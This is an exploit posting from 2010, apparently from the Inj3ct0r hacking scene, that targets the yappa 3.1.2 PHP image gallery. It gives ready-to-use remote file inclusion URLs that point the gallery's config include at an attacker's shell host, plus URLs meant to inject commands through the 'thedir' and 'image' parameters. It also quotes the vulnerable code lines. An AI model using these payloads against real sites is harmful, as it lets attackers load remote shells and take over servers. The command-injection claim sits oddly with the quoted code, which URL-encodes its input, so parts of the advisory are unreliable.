# ----------------------------------------------------------------------------
# Remote File Inclusion Vulnerability  and  Remote Command Execution Vulnerability
# ----------------------------------------------------------------------------
      
yappa <==3.1.2  (yappa.php) 
      
-------------------------------------------------------------- 
# [+] Author : Sn!pEr.S!Te Hacker    
# [+] Email : Sniper-site@HoTmaiL.Com    
# [+] Inj3ct0r Team Hacker #   
# [+] 9-7-2010   
# [+] Script : Image Galleries » yappa
# [+] Version: [3.1.2]
# [+] Download:http://manu.agat.net/yappa/yappa.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
-=[ exploit ]=-
   
http://localhost/yappa/yappa.php?[basedir/config.php]=http://SHELLURL.COM ?
   
   
http://127.0.0.1/yappa/yappa.php?[realpath/config.php]=http://SHELLURL.COM ?
 
-=[ exploit 2 ]=-
 
http://localhost/yappa/yappa.php?thedir=[ command you]
 
http://127.0.0.1/yappa/yappa.php?image=[ command you]
 
 
include("$basedir/config.php")
 
line 892
 
include("$realpath/config.php")
 
line 919
 
system("jhead \"".rawurlencode($thedir.$image)."\""); 
 
line 672
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
=========================| -=[ THE END]=- |=========================